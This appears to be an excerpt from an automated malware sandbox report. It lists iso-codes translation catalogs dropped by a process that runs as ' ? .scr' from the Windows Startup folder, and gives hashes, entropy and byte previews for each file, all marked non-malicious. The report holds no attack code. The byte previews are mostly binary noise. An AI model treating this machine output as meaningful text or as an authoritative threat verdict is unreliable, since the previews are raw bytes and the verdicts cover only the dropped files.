                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10499
                                                                                                    Entropy (8bit):5.021108931526039
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dcwJk6fF1TltU4WjV9qWxa5hW89w8uJZSimWruZUuOcA:mCvTg4WjVDxa5hW8y4hW9Fp
                                                                                                    MD5:42D66FA82C873C860F0993B05EBE4968
                                                                                                    SHA1:5904BEE3BC28AE31D40C3A1F0DE2471C475B3D8B
                                                                                                    SHA-256:0C64EABA5EA99310B5377FED36BBB7BA9E7BEEB9C72D42E4FCEBEAAC3D9BED71
                                                                                                    SHA-512:C46F06ABDF3790163B6037472BD6D34A1FC1567ABE483CC2E518F929304DA643C68F942CE7EEAD01C34A66766CD81797D02073FF241E99935BA6867DA5DE9D4A
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 421 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23811
                                                                                                    Entropy (8bit):4.983588636245265
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:snboRT6k+bRpY1Ina2G/s6hzmwZbjh5wsWP4XWAIziUGJNZ27H+8pMoUy/r7i1b:sxdna2GU6hzmotmsWP4XWAIH7H+8pMo6
                                                                                                    MD5:58A100C72AE1FE9B580D619A956CF83C
                                                                                                    SHA1:C682F3B8D301BE7BF80BBFF848DCD58B9976EF2B
                                                                                                    SHA-256:9C83673B8F544EF1B0FCFE86A8F6ABC463F645AFB7B814901DFC71E0470BB773
                                                                                                    SHA-512:A3F61F5F007468E92F80A87CCF1E19D8AE13FD4F9E1230AFE845D06426E466053179A012BD1B99211B35753412AED86792F4928F41EFF19966DAB742071ACF70
                                                                                                    Malicious:false
                                                                                                    Preview:................D...3...l.......8#......9#......E#......M#......U#......d#......l#......s#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......&$.......$......5$......;$......C$.. ...J$......k$......s$.. ....$.......$.......$.......$.......$.......$.......%.......%......1%......:%......G%......O%......Z%......c%......l%......s%.......%.......%.......%.......%.......%.......%.......%.......%.......%..,....&......@&......H&..%...N&......t&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,....&.."..."'..*...E'......p'......x'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(......#(..'...1(..$...Y(......~(.......(.......(.......(.......(.......).......).......)......#)......1)......B)......R)......n)......t).......).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 576 messages, Project-Id-Version: iso_3166-2 'Argovia'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23745
                                                                                                    Entropy (8bit):4.852062114818755
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:4I2rfRKgcT77/EvPbUKp4I5xGcrKU+4V2MYfYXF/8TcHEtU0/ClPAnkN1tVx:4Tc/gTPGc932MnFUXtUfOkJP
                                                                                                    MD5:5AAA2AFB0A99C9723B6EE3164AE19F63
                                                                                                    SHA1:002C04C2C42DBACAAD5ABFB6471F4C805F66A861
                                                                                                    SHA-256:54778BEE3F55797D29988ADEBC9B080BE96BF977C8DA32CCA096416596B11E9C
                                                                                                    SHA-512:01501B3161B17811AFA9D480AC8626003253C7AC2646531ED0E2EB35AD7F173A6CF0C9FA9EBDEB2DC904B814235CEDE0FBDD22B7EA8B689EE5F51A1CC5910495
                                                                                                    Malicious:false
                                                                                                    Preview:........@................$...... 0......!0......(0......10......90......>0......D0......J0......V0......_0......i0......w0.......0.......0.......0.......0.......0.......0.......0.......0.......0.......0.......0.......0.......1.......1......!1......*1......21......81......F1......M1......X1......c1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......2.......2.......2......%2......12......92......@2......G2......M2......V2......\2......j2......t2.......2.......2.......2.......2.......2.......2.......2.......2.......2.......2.......2.......2.......2.......3.......3.......3......&3......63......?3......J3......Q3......[3......d3......l3......t3......{3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......4.......4.......4.......4...... 4......)4.. ...:4......[4......e4......p4......y4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Antartikoko Lurralde Britainiarra'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2745
                                                                                                    Entropy (8bit):5.148825233424938
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADUdNGNUvGqIfdvqNuoUTw0K8jHjMulrX28MevyLhEkiS97/RXl:qDENGNUyBoD0KO4u1aevmv
                                                                                                    MD5:AADA30BCEFE8D3BC9F2025CAC7AB3893
                                                                                                    SHA1:80A900D524661A23194D0E147430D4A26C3915EB
                                                                                                    SHA-256:583C563BB2059F0F0D5894F6A3326E588006DC40DE9050CDF0D566ED635DD496
                                                                                                    SHA-512:192D28E3FA9476739C1975C5492174488B69CB127D1BA49B67F8E378F9FC9E35D9612A1C75011C8E1B0E87611CE1D266739EE3C832EBEEBE793F56E0B3C06079
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................!...n...(.......................5...........<.......D......._.......o...................#...........................".......2.......G.......X...,...h................................... ......./.........../...(...G.......p...(...}................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 8 messages, Project-Id-Version: iso_4217 'Peso argentinarra'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):856
                                                                                                    Entropy (8bit):5.17552374280983
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:u0J0Ah8rGXzZQnPt0U9bqW1w/6xWXmGs2:ue0AWGXAmULwqy
                                                                                                    MD5:9AADB9B9C085251BEABD25AEF5E26EF2
                                                                                                    SHA1:C4EC877451E0EC4B79D86F91A97D088FC793B998
                                                                                                    SHA-256:FFD70D111C5A4404C6E6696C81CC783A04E5679DA7AFF1892AC92193E0A5742D
                                                                                                    SHA-512:F805DFA5A7E36F8842E34BE7DBCC9C19657D37A978E5F9F031F42E0CC16B450ADBF22E73399DBB0591B98B1B10860931847434DD36C46BA3E772605613947AF1
                                                                                                    Malicious:false
                                                                                                    Preview:................\...............................................................................................................&.......-.......1...!...6................................................Argentine Peso.Armenian Dram.Australian Dollar.Kwanza.Lek.Taka.UAE Dirham.Project-Id-Version: iso_4217.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2021-01-27 09:32+0000.Last-Translator: Gontzal Manuel Pujana Onaindia <thadahdenyse@gmail.com>.Language-Team: Basque <https://hosted.weblate.org/projects/iso-codes/iso-4217/eu/>.Language: eu.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 4.5-dev..Peso argentinarra.Dram armeniarra.Dolar australiarra.Kwanza.Lek.Taka.Arabiar Emirerri Batuetako Dirham.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 481 messages, Project-Id-Version: iso_639-3 'Aari'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20888
                                                                                                    Entropy (8bit):4.7887950558007635
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:mPYE7wH1TVlBL6wliO6xdEhp59ee3XcsLM8iuC1P0mbkArTLEfr8+u70AgBEDUAT:WuTOwl96XEr5Z3XcMM/GArEj8+xbe5d9
                                                                                                    MD5:7C91DA36687F7EBB7966450E6AA7511C
                                                                                                    SHA1:75A39817B131BA714F83498504D1FFAF5028FFD5
                                                                                                    SHA-256:DA4B02038DFCF7019CCC27E5AEBA8A39273DDE674E21E3EF0989DD7A2F90B474
                                                                                                    SHA-512:E23499D8A2696931967314BC4396EFC20002F474BA112D3CDA8AB20F83D13BED7A1B5C1C63390BD3ABD010C339AAD8EB0F9036C2B56AB598FD6688EC91546C00
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......0(......1(......6(......<(......F(......S(......X(......a(......g(......m(......u(......}(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......).......).......)....../)......:)......A)......F)......L)......S)......j)......r)......y).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*...... *......4*......7*......@*......I*......X*......o*......w*......~*.......*.......*.......*.......*.......*.......*.......*.......*.......*.......*.......*.......*.......*.......+.......+.......+.......+.......+......$+......,+......8+......E+......J+......Q+......g+......p+......v+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......,.......,.......,.......,......",....../,......>,......O,......[,......j,......w,.......,.......,.......,.......,.......,.......,.......,.......,.......,......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 41 messages, Project-Id-Version: iso_15924 '\330\271\330\261\330\250\333\214'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2314
                                                                                                    Entropy (8bit):5.193658767358836
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:Cs6eISiGhd7kRbakb5EPkGxlU9p3UHuQMxwpQlheSsa:C3AiGh2+PkelqpEHAoQreSsa
                                                                                                    MD5:018122E5C660C5413969EE35C30FA644
                                                                                                    SHA1:0166CD3271E00F49FBC88303B8DD11113130E2E6
                                                                                                    SHA-256:A55A18595C5965BA09CD36267F9EF35C4C8A6B766B05F019BD8B2771BD1AEA31
                                                                                                    SHA-512:0DF7D4D4918CA468B0C485739AAB72F00524AA9A42C3FCDE96B9D9F05AC72AC8F2F7D326BB827483A529737F3F61345AD53D659A4A309A87C890D5C2265691C3
                                                                                                    Malicious:false
                                                                                                    Preview:........).......d...;........................................................................................................................... .......5.......<.......B.......K.......R.......[.......d.......l.......u.......{................................................................................................................................................... ...........................................&.......7.......@.......O.......b.......m.......v...............................................................................................'.......2.......G.......c.......n...................................................................................................................................................(...#...........&...%...................................$..............................."...!...........'...........)....................................................... ........Arabic.Arabic (Nastaliq variant).Armenian.Balinese.Batak.Bengali.Bopomofo.Brail
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: fa '\330\247\331\201\330\272\330\247\331\206\330\263\330\252\330\247\331\206'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26404
                                                                                                    Entropy (8bit):5.321527148304874
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:jhZgvq4S3AItmsWP4XdAIyQx/NyKL8eKbz:LgCPIM/NFwecz
                                                                                                    MD5:A7ED9359A49B75C2A2F635554FF2CEB4
                                                                                                    SHA1:481C74AD4351DDB70F3B8544413E152C482CEDCC
                                                                                                    SHA-256:EDD1600B33989EB65968E0EC884A99D2B61D5085F5F336AD2093B4F38CA98C0D
                                                                                                    SHA-512:5313E2CBBEFCBA87A036BA76EA19AEA2D5C4ADB5E547F8DF82B4C9CC170D76F2B295BA4FE3492644E255662B16EC8446D9CD7E16E9603883AC3C307B292DF37F
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):372
                                                                                                    Entropy (8bit):5.157704517013865
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijn1YYxAgCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITG69XmBQ8KMW0YEi9:i4n1xx8t02Ukx/iximCg5ITBXmBQWi9
                                                                                                    MD5:E0F8A23C46D3C418C62897A6328F7732
                                                                                                    SHA1:6B95831D974132F54F207657155538E84F6B3EA6
                                                                                                    SHA-256:5DD090E29019F75A194AC59AA5605AE0DFEF15F3479DBA0701E13199CA6B3AAB
                                                                                                    SHA-512:0477CC5F50F56B37D511002913C37DBB6BCD80ADFF3355C2CC2A7938B370C702F640227FB7A96DF1885837F29E57D0AB007FB7DD8165E73281759DF4D9396E8C
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...:...9................Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: fa.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: fa '\331\202\331\204\331\205\330\261\331\210 \331\202\330\267\330\250 \330\254\331\206\331\210\330\250 \330\250\330\261\333\214\330\252\330\247\331\206\333\214\330\247'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3140
                                                                                                    Entropy (8bit):5.5536204914542555
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADQpt69jovGqIfdvqNuXUoekU55ccoMrEHe++X/1r3tXaXtOOZ:qDst6FoyBXdO55chm4mvR3p8
                                                                                                    MD5:A8DFD9505700F0D78F6D81F158ECD870
                                                                                                    SHA1:EC9B11BF0644ED379D678E8B762AF145DABD18B9
                                                                                                    SHA-256:7600131F580F42880A31C5488462CDDC4A92CA6B31F94C06EC52EC4143FDD88A
                                                                                                    SHA-512:548DBBDC8EF39B9EAD52F869B90F18D31E5821077DB1AD7410A4298D8111561E97FE9D9595420E946D35DA4954C07489E9E67A522EE821B4BFFE4B3AB536CCE3
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................+.......5.......9.......)..."...J...L...........................#...............;.......*...B...#...m...........................................x......."...}...%.......................<.......]...&...........,...............K....................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 281 messages, Project-Id-Version: iso_639-3 '\330\242\330\250\330\256\330\247\330\262\333\214'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13407
                                                                                                    Entropy (8bit):5.03432833317091
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:32Z+tA+JR0RiEo1e/4qMyId9wc8RuWfBm:JfJaJBFb5m
                                                                                                    MD5:B11ABC8EF555ED847ECED925EB5CB315
                                                                                                    SHA1:7AF260E4A8DE35DA74A1524F607000112B4A14E4
                                                                                                    SHA-256:596532075570382A61C9B0B3343D463E1E363EC536ABDE67800AE09A97A3599C
                                                                                                    SHA-512:85CDBE2F4C4CD50CA0B8C569CB433EED40A58F42FA158FD3D88AB03D94B99AD8833C1C18B8B520C96B12EA6EB6F0F6D656F39DA3B38924BCCBB0F84AAED6EF51
                                                                                                    Malicious:false
                                                                                                    Preview:....................{........................................................................................................................................................... .......'.......3.......<.......D.......L.......T.......[.......`.......k.......s.......|.......................................................................................................................................................................%.......*.......0.......9.......?.......F.......M.......V.......\.......b.......h.......n.......w.......|...............................................................................................................................%.......+...............4.......9.......B.......I.......T.......Z.......a.......g...............................................................................................................................................................&.......,.......E.......Y.......a.......j.......s...............................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 82 messages, Project-Id-Version: iso_3166-1 'Albaniya'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3704
                                                                                                    Entropy (8bit):4.66532017721864
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:2du8bqIl/z3Ipa+Mp+APuI3ByJKqYXQnuYbwey:Op0paRtPYN4Qn/sey
                                                                                                    MD5:CBA805C0F4F22D6AE56F95FB3597278E
                                                                                                    SHA1:E79B7D25ACAAF5EC066ADD0E32D79C013093D5F0
                                                                                                    SHA-256:4A68E7141F9F15260D09928B3F4E1F40EBA1B4434602640EBAA828B38F32D6F5
                                                                                                    SHA-512:E2C31A28B6D2635687DEB4CBAC099F50C413AD92202632DB16226D2A45562D0A2B454FD6B7A5D010E014275DC1F1D32A6567E2D8B318EE9EB098FBF00C0DCB0E
                                                                                                    Malicious:false
                                                                                                    Preview:........R...........m...<............................................................... .......+.......3.......;.......A.......X.......a.......h.......q.......~...............................................................................................................................................................*.......2.......:.......B.......H.......N.......U.......].......k.......u....................................................................................................................................................... .......(.......3.......;.......B.......O.......Y.......b.......k.......s.......y...............................................................................................................................................................................................,.......5.......?.......G.......M.......Y.......`.......g.......p.......................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 159 messages, Project-Id-Version: iso_15924 'Afaka'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9006
                                                                                                    Entropy (8bit):4.905035173200453
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:zivG2E/UXE/t4j2j+Sa5hW8HAJgQPBfrycO:ziv3g14ajZa5hW8QlO
                                                                                                    MD5:4FC47C21DF5961D83E911B6E7A05B3D6
                                                                                                    SHA1:4B64EE77194672A372525A44362671C3DF34325D
                                                                                                    SHA-256:DF4C4388FEB065EF564886A819B5DDF576D37F74D6F51AE17B05CE3AE0723DA9
                                                                                                    SHA-512:5FA81BCA9B5AC6223E47EBDADF807380548C8BE609FE0138C5012BF4A0A0FABCB5BDF55458C203A394471B56E577DA814364EE9DEB3ADA938A2A773080526FC8
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................................................................................................................!.......*.......0.......J.......b...........................................&.......................(...........D.......U.......g.......|...............................................................................................*.......D.......W.......^.......g.......x...........................4...................#.......+.......2.......:.......C.......L.......W.......].......d...#...v.......................................................................................!......./.......4.......;.......B.......L.......^.......i...................................................(...................!.......3...-...=.......k.......w.......~...........#.......".......)...................................%.......>.......D.......L.......Y.......c.......l.......w................... ...................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 404 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22418
                                                                                                    Entropy (8bit):4.944593883717918
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:EADkYG2g6y0LRXKrK5Hgxr8jq5wsOP4XJOAE1i3NavbQiNZk7DqeW9:3ntR6rK5HgW+msOP4XJOAEJQiNZk72z
                                                                                                    MD5:E2FABD761540BF5E36D1B948D98055CD
                                                                                                    SHA1:AC2F7E6C1B59A0E254E0664D41A7B534DDE6A805
                                                                                                    SHA-256:6DE9A1BC72A33289E3BAE05FC1F2B499689E6F5C58A2FA895031A56C2EF6497B
                                                                                                    SHA-512:97CFAE17AD7C483D07B75C98CA065644CE515FBA8231E7BF3739A048B0D74FB4579A6B8B2C2D4E63715914984D2EC8460C027673708378EBAC60131CE93081D6
                                                                                                    Malicious:false
                                                                                                    Preview:........................\........!.......!.......!.......!.......!.......!......."......."......."......."......3"......J"......T"......g"......o"......u".......".......".......".......".......".......".......".......".......".......".......".......".. ....".......#.......#.. ...+#......L#......c#......l#......z#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......($......-$......3$......9$......J$......b$......k$.......$..,....$.......$.......$..%....$.......%.......%.......%......!%......&%....../%......6%......E%..%...T%..,...z%.."....%..*....%.......%.......%.......&.......&......"&......>&......F&......L&......X&......j&......r&......z&.......&.......&..'....&..$....&.......&.......'......2'......Q'......o'......t'......|'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(......'(.......(......8(......@(......K(......P(......Z(......c(......j(......x(.......(.......(..!....(.......(.......(......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 104 messages, Project-Id-Version: iso_3166-2 'Alabama'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5183
                                                                                                    Entropy (8bit):4.855788950153505
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ojlllQNGDhvDG4wRbbSKh/D1DHskx4UF/RXbMnCtUT1oK1heFLU3hE:oBlCyhS4w0uDCQpJbMCyZH/eu3hE
                                                                                                    MD5:3C1876F863DA65AA907B36D00D834322
                                                                                                    SHA1:1C991C7453B858DA8A1EA389758858C22B9E6703
                                                                                                    SHA-256:990B672692E62361CE159BD47604E628879C98CB6805D5CFEA9743DA65CB2430
                                                                                                    SHA-512:AC2CC7D2EE21BEAA3D79F9FC6B8B4ADB751F55CACB45E2A589A15174249BD2F7C63D1D979A18DA07E3656E6F81EB81844B2954BDCA175AA282AFE9DBC8289D46
                                                                                                    Malicious:false
                                                                                                    Preview:........h.......\...............................................................................................*.......B.......Y.......u.......................................................................................................#...............3.......=.......D.......J.......S.......[.......`.......g.......{...................#...........................................................................'.......2.......8.......=.......H.......V.......^.......g.......q.......}.......................................................................................................................7.......<.......E.......L.......Q.......^.......h.......r.......................................................................................................(...$...........S.......X.......`.......p.......x...........................................~...........A.......I.......P......._.......g.......p.......v...................................!...........................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Brittil\303\244inen Antarktis-alue'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2647
                                                                                                    Entropy (8bit):5.086964702545363
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADq/ypxvGqIfdvqNuoUPXCuNOsUoFNgIr9sgf:qDqixyBoyNNtbFNHrKgf
                                                                                                    MD5:09308CB06C122AB2B73DBDAB9B611C04
                                                                                                    SHA1:D65BB4A6FC354BFD63D88911767D45BC17DBAEC3
                                                                                                    SHA-256:4D5308942B3B898A3B14979CA60FC16131DF21F9C0F59A884B85FA6DC4FEF773
                                                                                                    SHA-512:1702754CF89DAEBB9077A6FB1535B56D2B5ACC7C36B82682D6CB188CE09F12E0CCB4EF9475347B446AF12A8ADF133C31EFA0E183A8413CD7EF48DC33E0162B96
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c.......................S...$...p.../...............(...........................'.......2.......D...&...a..........................................................."...........3.......G.......\.......c...+...s...:...............#...............&...........F........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 142 messages, Project-Id-Version: iso_4217 'Afganistanin afgaani'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7172
                                                                                                    Entropy (8bit):4.764309913511248
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ffXUSiqyeGGGnXNJqMcd1d417WSyzZIG8ldS3kwKm1W9/OeG1H1ilRRs:HniqyehKYMS417WPCVOkKYplU
                                                                                                    MD5:45C67C262253DDA9347D176615D362A6
                                                                                                    SHA1:42CD18C59BE3040F0E226203BD6EF59F0CDAA2AA
                                                                                                    SHA-256:75F952E6338021CAB32765CA9133F72F123C61CC59D8EDD0BEE05705B9331406
                                                                                                    SHA-512:082A4E90A189903B4EC8B0E97277B3A3F4EF4815F19A4E8835D456574CA7ED094B458751AC5C94A23304C57868FBA920228271775501BEEED87E82E0BCDFC10E
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................-.......?.......O.......^.......c.......j.......z...............................................................................................+.......8.......G.......W.......c.......u.......................................................................................................................2.......>.......E.......P.......`.......e.......l.......t.......................................................................................................................#.......2.......6.......>.......D.......T.......a.......k.......p...............................................................................................................7.......H.......X.......`.......o.......y...............................................................................................................................!.......-.......;.......L.......S.......d.......{.......................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 339 messages, Project-Id-Version: iso_639-3 'abhaasi'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13276
                                                                                                    Entropy (8bit):4.592618617301529
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:bB7CrhTlfkHuK7gbWUKvyKlerWfFMrsQ8aB4TNfKqOz9akao:mhaUu90PaK
                                                                                                    MD5:08AAB0C5698C608E8BEBC8A2D267317C
                                                                                                    SHA1:B5939ECDC45A3703B03F3AEBDFC6CBB0DA0D8CF4
                                                                                                    SHA-256:853799D7F533F43DBAA8FE6259F41833544D47724FD9A2B7887F5BFC457FA181
                                                                                                    SHA-512:CA8819B54603F54298106A512F1ECAEC10CEA964A8E8DC9C8F65CF50C31D6BA221FAB0111750E9ED3981C1BDD23D1A26AB4028356F0E6A7FCA0744F04D9BB287
                                                                                                    Malicious:false
                                                                                                    Preview:........S...............L.......p.......q.......{...............................................................................................................................................................................%.......1.......:.......B.......J.......R.......Y.......^.......i.......q.......z.......................................................................................................................................................................$...............6.......?.......G.......X......._.......g.......p.......u.......{.......................................................................................................................................................!.......+.......4.......8.......?.......E.......M.......T.......\.......`.......g.......p.......v.......y................................................................................................................ ....... ....... ....... ....... ......$ ....../ ......5 ......? ......G ......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10473
                                                                                                    Entropy (8bit):5.056738201086365
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dJ7yw7CnbE0ltU4WjV9qWxa5hW8i1XZDRVQ4qjZaohW/:57yrg4WjVDxa5hW8iti4qjZaohW/
                                                                                                    MD5:62BDDD446C215440E3CF6CBA216A9D0B
                                                                                                    SHA1:D800B6AFC9DD87B053CE8AC0541DBE3601FE973C
